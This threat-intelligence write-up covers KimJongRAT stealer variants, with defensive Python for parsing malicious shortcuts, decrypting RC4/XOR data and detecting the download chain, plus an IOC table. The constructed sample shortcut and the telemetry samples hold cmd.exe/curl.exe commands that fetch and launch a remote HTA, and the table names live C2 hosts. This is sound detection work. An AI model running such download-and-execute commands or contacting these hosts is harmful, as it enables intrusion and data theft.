A new wave of KimJongRAT stealer variants has been identified, showcasing advanced delivery, persistence, and information theft techniques.
Both PE and PowerShell-based versions were observed, with attack chains initiated via malicious Windows shortcut (LNK) files.
Upon user interaction, these LNK files trigger the download and execution of multi-stage payloads from attacker-controlled locations on legitimate content delivery networks (CDNs), so that the staging traffic blends in with trusted services and evades detection.
Technical Details of the PE Variant Chain
The PE variant uses a staged approach. The attack begins when a victim opens a weaponized .LNK file which, through built-in Windows utilities such as cmd.exe and curl.exe, downloads a disguised HTML Application (HTA) file from a legitimate CDN provider.
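The shortcut is the only stage a defender gets to see before anything leaves the network, so it is worth being able to read it without double-clicking it. The following triage helper is an added example, not code from the Unit 42 report or from the malware: it parses the StringData of a Windows .LNK (target, working directory, arguments) per the ShellLink header layout and flags the cmd.exe/curl.exe download pattern described above. The sample shortcut it builds is constructed for the demonstration; its URL, file names and the way it launches the downloaded HTA are invented, not taken from the campaign.

```python
"""Triage helper for the shortcut stage: parse a Windows .LNK file's StringData (target path,
working directory, arguments) and flag the cmd.exe/curl.exe download pattern.
Added example, not code from the report or the campaign."""
import struct
import uuid

# LinkFlags bits from the ShellLinkHeader ([MS-SHLLINK] 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))
# Tokens that, inside a shortcut's command line, point at a living-off-the-land download
SUSPICIOUS_TOKENS = ("cmd.exe", "curl", ".hta", "mshta", "powershell", "http")


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a shortcut; raise ValueError if it is not a ShellLink."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("not a ShellLink: bad HeaderSize")
    if uuid.UUID(bytes_le=data[4:20]) != LNK_CLSID:
        raise ValueError("not a ShellLink: bad CLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:          # uint16 size, then the ItemIDs
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # first uint32 is the whole structure size
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for flag, name in STRING_FIELDS:             # each: CountCharacters (uint16) + chars, no NUL
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[name] = data[pos:pos + count].decode("cp1252", "replace")
            pos += count
    return fields


def lnk_indicators(fields: dict) -> list:
    """Return the suspicious tokens found in the shortcut's target and arguments."""
    text = " ".join(fields.get(k, "") for k in ("relative_path", "working_dir", "arguments")).lower()
    return [tok for tok in SUSPICIOUS_TOKENS if tok in text]


def build_lnk(relative_path: str, arguments: str, name: str = "") -> bytes:
    """Assemble a minimal Unicode shortcut (no IDList/LinkInfo) so the parser can be exercised offline."""
    flags = IS_UNICODE | HAS_RELATIVE_PATH | HAS_ARGUMENTS | (HAS_NAME if name else 0)
    header = struct.pack("<I16sIIqqqIiIHHII", 0x4C, LNK_CLSID.bytes_le, flags,
                         0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)   # FILE_ATTRIBUTE_ARCHIVE, SW_SHOWNORMAL

    def string_data(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    body = string_data(name) if name else b""
    return header + body + string_data(relative_path) + string_data(arguments)


# Constructed sample, not an artefact from the campaign: a shortcut posing as a document whose
# target is cmd.exe and whose arguments fetch and launch a remote HTA (URL and file names invented).
SAMPLE_LNK = build_lnk(
    r"..\..\..\Windows\System32\cmd.exe",
    r'/c curl.exe -s -o "%TEMP%\report.hta" https://cdn.example.invalid/stage/report.hta && start "" "%TEMP%\report.hta"',
    name="Quarterly report.pdf",
)

if __name__ == "__main__":
    fields = parse_lnk(SAMPLE_LNK)
    for k, v in fields.items():
        print(f"{k:14} {v}")
    print("indicators:", lnk_indicators(fields))
```

Real shortcuts almost always carry a LinkTargetIDList and a LinkInfo block before the strings; the parser skips both by their declared sizes, so it works on files pulled from a mailbox or a download directory as well as on the constructed sample. A relative path that climbs out of the document folder into System32, combined with arguments that contain a URL, is the shape to hunt for.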

The HTA file, which embeds obfuscated VBScript, drops three files: a decoy PDF, a text file listing payload URLs, and a 64-bit DLL loader.
The loader, sys.dll, fetches RC4-encrypted payloads from the URLs in that text file and ultimately deploys the stealer and orchestrator components (net64.log and main64.log).
These components implement extensive reconnaissance and exfiltration capabilities, including browser data, system information, email and FTP credentials, and files of interest (such as cryptocurrency wallet data).
The orchestrator communicates with the attacker’s command and control (C2) infrastructure, uploading compressed and XOR-encrypted archives of stolen data, and supporting further attacker commands via HTTP POST and GET requests.
Custom encoding and encryption routines obscure both strings and data, complicating analysis and detection.
For instance, API call strings are encoded using a substitution cipher, and exfiltrated archives are XORed prior to network transmission.
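Both transforms named in this section, RC4 for the staged payloads that sys.dll retrieves and XOR for the archives the orchestrator uploads, are cheap to undo once the key is known, and for the XOR case the key can usually be recovered from the ciphertext alone because a compressed archive starts with a fixed magic. The block below is an added example, not code from the report or the malware: it implements RC4, and a known-plaintext recovery of a short repeating XOR key that is confirmed by actually opening the archive. The report does not publish the campaign's keys or key lengths, so the key, the archive contents and the payload bytes here are all constructed. The substitution cipher used for the API strings is not reproduced because its table is not on this page.

```python
"""Analyst helpers for the two symmetric transforms used by the PE chain: RC4 for staged
payloads and repeating-key XOR for exfiltrated archives. Added example; the campaign's
actual keys are not in the report, so every key below is constructed."""
import gzip
import io
import zipfile


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA then PRGA); the same call encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(c ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR (its own inverse)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


# Archive formats we can both recognise by magic and validate with the standard library
ARCHIVE_MAGIC = {"zip": b"PK\x03\x04", "gzip": b"\x1f\x8b\x08"}


def _opens_as_archive(fmt: str, plain: bytes) -> bool:
    if fmt == "zip":
        return zipfile.is_zipfile(io.BytesIO(plain))
    try:
        gzip.decompress(plain)
        return True
    except (OSError, EOFError):
        return False


def recover_xor_key(blob: bytes, max_key_len: int = 8):
    """Known-plaintext attack on a XORed archive: key[i] = blob[i] ^ magic[i]. Each candidate
    key length up to the magic length is derived, checked for consistency across the whole
    magic, then confirmed by parsing the decoded archive. Returns (format, key) or None."""
    for fmt, magic in ARCHIVE_MAGIC.items():
        for klen in range(1, min(max_key_len, len(magic)) + 1):
            key = bytes(blob[i] ^ magic[i] for i in range(klen))
            if xor_bytes(blob[:len(magic)], key) != magic:
                continue
            if _opens_as_archive(fmt, xor_bytes(blob, key)):
                return fmt, key
    return None


def build_sample_exfil(key: bytes) -> bytes:
    """Constructed stand-in for an exfiltration upload: a ZIP of fake 'stolen' files, XORed."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("sysinfo.txt", "HOST=WIN-TEST USER=analyst (constructed sample)")
        zf.writestr("Login Data", b"\x00" * 64)   # placeholder for a browser credential database
    return xor_bytes(buf.getvalue(), key)


def recovered_file_names(blob: bytes):
    """Recover the XOR key and list the archive's members; None if no key is found."""
    found = recover_xor_key(blob)
    if found is None:
        return None
    fmt, key = found
    if fmt != "zip":
        return []
    with zipfile.ZipFile(io.BytesIO(xor_bytes(blob, key))) as zf:
        return zf.namelist()


if __name__ == "__main__":
    # RC4 round trip with a constructed key, as an analyst would decrypt a staged payload
    staged = rc4(b"constructed-key", b"MZ\x90\x00 ... constructed payload bytes ...")
    assert rc4(b"constructed-key", staged).startswith(b"MZ")
    blob = build_sample_exfil(b"\x5a\xc3\x19")
    print(recover_xor_key(blob))       # ('zip', b'Z\xc3\x19')
    print(recovered_file_names(blob))  # ['sysinfo.txt', 'Login Data']
```

Two points from the design carry over to real samples. A key as long as the magic cannot be checked for consistency, which is why every candidate is confirmed by parsing the archive rather than by the magic alone; and a capture of the upload traffic is enough to run this, because the orchestrator applies the XOR after compression, so the recovered plaintext is a normal archive.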
PowerShell Variant
The PowerShell variant mirrors the overall execution flow of the PE version but relies on an embedded ZIP archive containing a PowerShell stealer and a VBS persistence script.

Upon execution, the dropper opens a decoy PDF, extracts the ZIP archive, and runs the main PowerShell script.
According to the Unit 42 report, this script performs anti-VM checks, establishes persistence via registry keys, and collects exhaustive system and browser data.
Particularly notable in the PowerShell stealer is its focus on cryptocurrency assets. The script walks the profile directories of popular browsers (Chrome, Edge, Naver Whale, Firefox) to extract credentials, cookies, and sensitive files.
It also systematically searches for browser extensions associated with cryptocurrency wallets such as MetaMask, Trust Wallet and TronLink, among others, copying extension data and configuration files for exfiltration.
All harvested content is compressed and uploaded to the attacker’s C2 using chunked HTTP POSTs.
The persistent VBS script ensures the stealer is automatically executed at user logon, maintaining continuous access for the threat actor.
The backdoor component of the PowerShell variant facilitates subsequent data theft and remote command execution, supporting both file uploads and downloads, additional malware deployment, and interactive command execution.
Since it was first described in 2013, KimJongRAT has been adapted continuously to evade defenses and maximize payload impact.
Its multi-file, multi-stage structure, blending native Windows tools, obfuscated scripts, and legitimate Internet services, presents detection and response challenges.
The enhanced focus on cryptocurrency theft signals alignment with broader cybercriminal monetization trends.
Security vendors, including Palo Alto Networks, have updated detection logic to track these evolving threats.
Protection strategies recommended include advanced behavioral monitoring, URL and DNS filtering, and regular incident response exercises.
Organizations should remain vigilant for unusual LNK file activity and unknown outbound connections to suspicious CDNs or dynamic DNS services.
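The hunting guidance above translates directly into a few telemetry rules: a shortcut launched from the desktop shows up as explorer.exe spawning cmd.exe with a download utility and a URL on its command line, and the network side is a lookup of a dynamic-DNS name or a request to one of the staging or C2 locations in the IOC table below. The block that follows is an added example, not a detection from Palo Alto Networks or any vendor product: it runs those rules over constructed, Sysmon-like event records. The C2 and CDN indicators are the ones from the IOC table (refanged in code); the file names, the benign events, and the dynamic-DNS suffixes other than ddns.net are assumptions made for the demonstration.

```python
"""Detection sketch for the hunting guidance above, run over constructed endpoint telemetry:
flag the shortcut-launched cmd.exe/curl.exe download chain and outbound connections to
dynamic-DNS hosts, the C2 servers and the CDN path from the IOC table. Added example; the
event records below are invented, not from a real host."""
import re
from urllib.parse import urlparse


def refang(s: str) -> str:
    """Turn a defanged indicator ('a[.]b') back into a matchable one."""
    return s.replace("[.]", ".")


# Network indicators copied (defanged) from the IOC table
IOC_HOSTS = {refang(h) for h in ("131.153.13[.]235", "secservice.ddns[.]net", "srvdown.ddns[.]net")}
IOC_URL_PREFIXES = tuple(refang(p) for p in (
    "131.153.13[.]235/sp/", "secservice.ddns[.]net/service2/", "srvdown.ddns[.]net/service3/",
    "cdn.glitch[.]global/2eefa6a0-44ff-4979-9a9c-689be652996d/",
))
STAGING_CDN_HOSTS = {"cdn.glitch.global"}   # legitimate CDN abused for staging, per the IOC table
# ddns.net appears in the IOCs; the other suffixes are common dynamic-DNS providers (assumption)
DDNS_SUFFIXES = (".ddns.net", ".duckdns.org", ".hopto.org")
DOWNLOADERS = ("curl", "certutil", "bitsadmin", "powershell")
URL_RE = re.compile(r"https?://\S+", re.I)


def basename(path: str) -> str:
    return path.lower().replace("/", "\\").rsplit("\\", 1)[-1]


def host_and_path(url: str) -> str:
    u = urlparse(url)
    return u.netloc.lower() + u.path


def detect(events):
    """Return (event_index, rule_name) pairs for every rule each event trips."""
    hits = []
    for idx, ev in enumerate(events):
        if ev.get("type") == "process":
            image, parent = basename(ev.get("image", "")), basename(ev.get("parent", ""))
            cmd = ev.get("cmdline", "")
            has_url = URL_RE.search(cmd) is not None
            # explorer.exe -> cmd.exe/powershell.exe is what a double-clicked shortcut looks like
            if (image in ("cmd.exe", "powershell.exe") and parent == "explorer.exe"
                    and has_url and any(d in cmd.lower() for d in DOWNLOADERS)):
                hits.append((idx, "lnk_downloader_chain"))
            if image == "curl.exe" and parent == "cmd.exe" and has_url:
                hits.append((idx, "curl_spawned_by_cmd"))
        elif ev.get("type") in ("dns", "network"):
            host = ev.get("host", "").lower()
            if host in IOC_HOSTS:
                hits.append((idx, "known_c2_host"))
            if host.endswith(DDNS_SUFFIXES):
                hits.append((idx, "dynamic_dns_host"))
            if host in STAGING_CDN_HOSTS:
                hits.append((idx, "staging_cdn_host"))
            url = ev.get("url")
            if url and host_and_path(url).startswith(IOC_URL_PREFIXES):
                hits.append((idx, "known_ioc_url"))
    return hits


# Constructed telemetry (simplified Sysmon-like fields); everything except the IOC hosts/paths is invented
GLITCH = refang("cdn.glitch[.]global/2eefa6a0-44ff-4979-9a9c-689be652996d/")
SAMPLE_EVENTS = [
    {"type": "process", "parent": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": f'cmd.exe /c curl.exe -s -o "%TEMP%\\report.hta" https://{GLITCH}report.hta'},
    {"type": "process", "parent": "C:\\Windows\\System32\\cmd.exe", "image": "C:\\Windows\\System32\\curl.exe",
     "cmdline": f'curl.exe -s -o "%TEMP%\\report.hta" https://{GLITCH}report.hta'},
    {"type": "process", "parent": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "cmd.exe /c dir"},                                        # benign
    {"type": "dns", "host": "secservice.ddns.net"},
    {"type": "network", "host": "131.153.13.235", "url": "http://131.153.13.235/sp/"},
    {"type": "dns", "host": "login.microsoftonline.com"},                  # benign
    {"type": "network", "host": "cdn.glitch.global", "url": f"https://{GLITCH}report.hta"},
]

if __name__ == "__main__":
    for idx, rule in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

The process rules are the durable part: hashes and URLs in the IOC table rotate, while explorer.exe spawning cmd.exe that immediately calls curl.exe with a URL is the behaviour the delivery depends on. The staging CDN is a legitimate service, so a hit on it is a lead to review rather than a verdict on its own.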
Indicators of Compromise (IOCs)
Indicator Type | Value/Description |
---|---|
Initial LNK SHA256 | a66c25b1f0dea6e06a4c9f8c5f6ebba0f6c21bd3b9cc326a56702db30418f189 (and others) |
First Stage HTA SHA256 | 02783530bbd8416ebc82ab1eb5bbe81d5d87731d24c6ff6a8e12139a5fe33cee (and others) |
Second Stage Loader SHA256 | f4d9547269e0cd7a0df97e394f688e0eb00b31965abd5e6ad67d373a7dc58f3b (and others) |
Orchestrator SHA256 | 85be5cc01f0e0127a26dceba76571a94335d00d490e5391ccef72e115c3301b3 (and others) |
KimJongRAT Stealer SHA256 | 96df4f9cb5d9cacd6e3b947c61af9b8317194b1285936ce103f155e082290381 (and others) |
PowerShell Loader SHA256 | 97d1bd607b4dc00c356dd873cd4ac309e98f2bb17ae9a6791fc0a88bc056195a |
PowerShell Stealer SHA256 | b103190c647ddd7d16766ee5af19e265f0e15d57e91a07b2a866f5b18178581c |
PowerShell Keylogger SHA256 | 3c6476411d214d40d0cc43241f63e933f5a77991939de158df40d84d04b7aa78 |
Persistence VBS File SHA256 | f73164bd4d2a475f79fb7d0806cfc3ddb510015f9161e7dce537d90956c11393 |
Attacker CDN URLs | cdn.glitch[.]global/2eefa6a0-44ff-4979-9a9c-689be652996d/, cdn.glitch[.]global/17443dac-272c-421c-80ac-… |
C2 Servers | 131.153.13[.]235/sp/, secservice.ddns[.]net/service2/, srvdown.ddns[.]net/service3/ |